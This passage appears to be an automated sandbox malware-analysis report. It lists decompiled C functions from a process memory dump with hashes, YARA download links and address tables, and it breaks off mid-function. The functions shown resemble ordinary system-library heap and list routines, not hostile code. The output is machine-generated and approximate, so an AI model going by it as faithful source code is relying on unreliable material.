Instruction ID: 0af5c9178e95a7f4f839654bb8455a536813b45a7e619a9cb84907473732562c
Opcode Fuzzy Hash: bbb0c86739d2895bc310685ab4b444009bca00cc8f11601ff8b4b145114d2d97
Instruction Fuzzy Hash: 71318331B05A25EBD7248F39C941A7AB7B5EF55700B05846AEC85CB360F738E881DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0461A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0461A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x46c0220);
				E0463D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x46d7b9c; // 0x0
				_t55 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0463D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x46d7b10 =  *0x46d7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x46d536c; // 0xa0c008
					if( *_t51 != 0x46d5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x46d5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x46d536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0461A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0461a61c
0x0461a61e
0x0461a623
0x0461a628
0x0461a62b
0x0461a62d
0x0461a648
0x0461a64a
0x0461a64f
0x04659b44
0x0461a6ec
0x0461a6f1
0x0461a6f1
0x0461a655
0x0461a657
0x0461a65a
0x0461a65d
0x0461a662
0x0461a663
0x0461a667
0x0461a668
0x0461a66d
0x0461a706
0x0461a706
0x04659bda
0x04659be6
0x04659beb
0x00000000
0x04659beb
0x0461a679
0x04659b7a
0x00000000
0x04659b7a
0x0461a683
0x0461a6f4
0x0461a6f7
0x0461a6f9
0x0461a6fd
0x0461a6a0
0x0461a6a0
0x0461a6ad
0x0461a6af
0x0461a6b4
0x04659ba7
0x04659bac
0x00000000
0x00000000
0x04659bc6
0x04659bce
0x04659bd1
0x04659bd3
0x04659bd3
0x00000000
0x04659bd1
0x0461a6bd
0x0461a6c3
0x0461a6c6
0x0461a6d2
0x0461a701
0x0461a704
0x00000000
0x0461a704
0x0461a6d4
0x0461a6d6
0x0461a6d9
0x0461a6db
0x0461a6e1
0x0461a6e6
0x0461a6e8
0x0461a6e8
0x0461a6ea
0x00000000
0x0461a6ea
0x0461a688
0x0461a692
0x0461a694
0x0461a699
0x00000000
0x00000000
0x0461a69d
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e82d5cb8843e3d0719219f458b09d5c3785e95852997a41622d280785b2635
Instruction ID: fa423ae3dce2924a77ed4e9a30cd23d812b4e3ef6c03082fa5fd6a7278f90bda
Opcode Fuzzy Hash: 32e82d5cb8843e3d0719219f458b09d5c3785e95852997a41622d280785b2635
Instruction Fuzzy Hash: FE4149B5A01205DFDB14CF98C990BAABBF1FF49304F198069E804AB354E775B901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04667016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04667016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x46dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04666B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04666B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04607D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04629AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0462B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04604620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04667016
0x0466701e
0x0466702b
0x04667033
0x04667037
0x0466703c
0x0466703e
0x04667041
0x04667045
0x0466704a
0x04667050
0x04667055
0x0466705a
0x04667062
0x04667062
0x0466705a
0x04667064
0x04667064
0x04667067
0x04667071
0x04667096
0x0466709b
0x046670a2
0x046670a6
0x046670a7
0x046670ad
0x046670b3
0x046670b6
0x046670bb
0x046670c3
0x046670c3
0x046670c6
0x046670cd
0x046670dd
0x046670e0
0x046670e2
0x046670e2
0x046670ee
0x04667101
0x046670f0
0x046670f9
0x046670f9
0x0466710a
0x0466710e
0x04667112
0x04667117
0x04667118
0x04667118
0x046670bb
0x0466711d
0x04667123
0x04667131
0x04667131
0x04667136
0x0466713d
0x0466713e
0x0466713f
0x0466714a
0x0466714a
0x04667084
0x04667088
0x00000000
0x0466708e
0x0466708e
0x04667092
0x00000000
0x04667092

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b7dad7a15cb84268d8354eb3b224b525e8a99d3c831dcf3d88406739f64f75
Instruction ID: bf3579c2072c9bce37c76e76186982fbfb259aae1755abc9c01f0ca0aaa1a9fb
Opcode Fuzzy Hash: 21b7dad7a15cb84268d8354eb3b224b525e8a99d3c831dcf3d88406739f64f75
Instruction Fuzzy Hash: B5319272604751ABC324DF68C940A6AB7A9FF98705F044A2DF89687790F730F914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0460C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0460C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04607D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E046B8D34(_v8, _t80);
					}
					E04602280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E045FFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E046B8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E045FFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0462B180();
						if(_a4 != 0) {
							E04602280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0460BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0460BB2D(_t16, _t15);
						E0460B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E045FFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E045FFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E045FFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0460c18d
0x0460c18f
0x0460c191
0x0460c19b
0x0460c1a0
0x0460c1d4
0x0460c1de
0x04652d6e
0x0460c1e4
0x0460c1e4
0x0460c1e4
0x0460c1ec
0x04652d7d
0x04652d7d
0x0460c1f3
0x0460c1ff
0x04652d88
0x04652d8d
0x04652d94
0x04652d94
0x04652d9f
0x04652da4
0x04652dab
0x04652db0
0x04652db2
0x04652db3
0x04652db4
0x04652dbc
0x04652dc3
0x04652dc3
0x0460c205
0x0460c205
0x0460c208
0x0460c20e
0x0460c211
0x0460c216
0x0460c219
0x0460c21f
0x0460c222
0x0460c22c
0x0460c234
0x0460c23a
0x0460c23f
0x0460c245
0x0460c24b
0x0460c251
0x0460c25a
0x0460c276
0x0460c27d
0x0460c27d
0x0460c25c
0x0460c25c
0x00000000
0x0460c25e
0x0460c1a4
0x0460c1aa
0x0460c1b3
0x0460c265
0x0460c26c
0x0460c26c
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: e51875d14eaf6d5e7b08ef5480255f0278ab2bf6bdcfeb96e554926d4c5e9d96
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 6D31F472701546AEE70CEBB4C890BEAF754BF52208F04C29AD51857381FB347A4ADBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04693D40 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04693D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x46dd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E04602280(_t34, 0x46d8a6c);
				_t64 =  *0x46d5768; // 0x77495768
				if(_t64 != 0x46d5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77495770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E045FFFB0(_t53, _t64, 0x46d8a6c);
						 *0x46db1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E04602280(_t45, 0x46d8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x46d5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E045FFFB0(_t51, _t64, 0x46d8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0462B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x04693d40
0x04693d48
0x04693d52
0x04693d59
0x04693d5d
0x04693d61
0x04693d63
0x04693d67
0x04693d69
0x04693d72
0x04693d76
0x04693d7a
0x04693d7f
0x04693d8b
0x04693d91
0x04693d91
0x04693d91
0x04693d94
0x04693d96
0x04693d9d
0x04693da1
0x04693db0
0x04693dba
0x04693dbc
0x04693dbc
0x04693dc6
0x04693dcb
0x04693dcf
0x04693dd1
0x04693dd4
0x00000000
0x00000000
0x04693dd9
0x04693e0c
0x04693e0c
0x04693e0f
0x04693ddb
0x04693ddb
0x04693de0
0x00000000
0x04693de2
0x04693de2
0x04693de4
0x04693de8
0x04693deb
0x04693df1
0x00000000
0x04693df3
0x04693df3
0x04693df5
0x04693df8
0x04693dfa
0x00000000
0x04693dfa
0x04693df1
0x04693de0
0x04693e11
0x04693e11
0x00000000
0x04693dfe
0x04693e04
0x04693e06
0x00000000
0x04693e06
0x00000000
0x04693e04
0x04693d91
0x04693e15
0x04693e1a
0x04693e1f
0x04693e1f
0x04693e23
0x04693e29
0x00000000
0x00000000
0x04693e2e
0x00000000
0x04693e30
0x04693e30
0x04693e35
0x00000000
0x04693e37
0x04693e3e
0x04693e42
0x04693e48
0x04693e4e
0x00000000
0x04693e4e
0x04693e35
0x00000000
0x04693e2e
0x04693e5b
0x04693e5c
0x04693e5d
0x04693e68
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684e8548d9ce2faec5fcff5a91b07254346b47acd066fa58185b8e1701916687
Instruction ID: a5378864ea0a7ed5ca29e7d1557433a9d2f3becb17a9a98fcce6a276f5f656b0
Opcode Fuzzy Hash: 684e8548d9ce2faec5fcff5a91b07254346b47acd066fa58185b8e1701916687
Instruction Fuzzy Hash: 88316771A09302DFCB14DF18C58445ABBE5FF89604F09896EE8988B340E770ED48CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0461A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0461A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x46d7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x46d7b10 = 8;
					 *0x46d7b14 = 0x46d7b0c;
					 *0x46d7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0461A990(0x46d7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0461A840(__edx, __ecx, __ecx, _t52, 0x46d7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x46d7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x46d7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x46d7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04604620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x46d7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0462F3E0(_t50,  *0x46d7b14, _t8 >> 3);
						_t28 =  *0x46d7b14; // 0x77497b0c
						__eflags = _t28 - 0x46d7b0c;
						if(_t28 != 0x46d7b0c) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x46d7b14 = _t50;
						_t48 = _v12;
						 *0x46d7b10 = _t9;
						goto L6;
					}
					 *0x46d7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0461a713
0x0461a714
0x0461a717
0x0461a71d
0x0461a720
0x0461a722
0x0461a727
0x0461a74a
0x0461a754
0x0461a75e
0x0461a768
0x0461a76a
0x0461a773
0x0461a78b
0x0461a790
0x0461a792
0x0461a741
0x0461a741
0x0461a743
0x0461a749
0x0461a749
0x0461a732
0x0461a73a
0x0461a797
0x0461a79d
0x0461a7a3
0x0461a7a9
0x0461a7b6
0x0461a7bc
0x0461a7ca
0x0461a7e0
0x0461a7e2
0x0461a7e4
0x04659bf2
0x00000000
0x04659bf2
0x0461a7ed
0x0461a7f2
0x0461a800
0x0461a805
0x0461a80d
0x0461a812
0x04659c08
0x04659c08
0x0461a818
0x0461a81b
0x0461a821
0x0461a824
0x00000000
0x0461a824
0x0461a7ae
0x00000000
0x0461a7ae
0x0461a73c
0x0461a73e
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4a623007e57b80608fd13f37e6545590b2bb706bc059fc4e04f608e06828eb
Instruction ID: 3f2b3faae34475a55cbff13e770a18e9959c55f93b467ef0dcbd7c85d4cbcf20
Opcode Fuzzy Hash: 1f4a623007e57b80608fd13f37e6545590b2bb706bc059fc4e04f608e06828eb
Instruction Fuzzy Hash: C831AAB5A12200AFE711CF58D880F2ABBF9EF95711F18495AE84587350F778BE01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 046161A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E046161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04615E50(0x45c67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E046B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E045EF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x046161b3
0x046161b5
0x046161bd
0x046161c3
0x046161c7
0x046161d2
0x046161ff
0x046161ff
0x04616201
0x04616207
0x04616207
0x046161d4
0x046161d9
0x00000000
0x00000000
0x046161df
0x046161e2
0x00000000
0x00000000
0x046161e6
0x046161e8
0x046161ee
0x046161ee
0x046161f9
0x0465762f
0x04657632
0x04657635
0x04657639
0x04657640
0x0465766e
0x04657675
0x00000000
0x00000000
0x04657681
0x04657689
0x0465768d
0x04657691
0x04657695
0x04657699
0x046576af
0x046576b5
0x046576b7
0x046576b7
0x046576d7
0x046576dc
0x00000000
0x046576dc
0x046576a2
0x046576a9
0x04657651
0x04657653
0x04657653
0x04657656
0x04657656
0x00000000
0x04657656
0x04657644
0x04657646
0x04657648
0x04657648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b769f2e75ded0de6ecc85220afae239b17728f07b6fa01702d24880367b43cde
Instruction ID: d8357ac1a0a107566e826f54970cc1b11f61f23c382b583816102be39a0d7e70
Opcode Fuzzy Hash: b769f2e75ded0de6ecc85220afae239b17728f07b6fa01702d24880367b43cde
Instruction Fuzzy Hash: 1E3178726097019FD320DF1DC840B2AB7E5FB98B00F09496EE9989B361F7B0E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 045EAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E045EAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x46dd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x46d7b9c; // 0x0
					_t53 = L04604620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0462B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0462F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
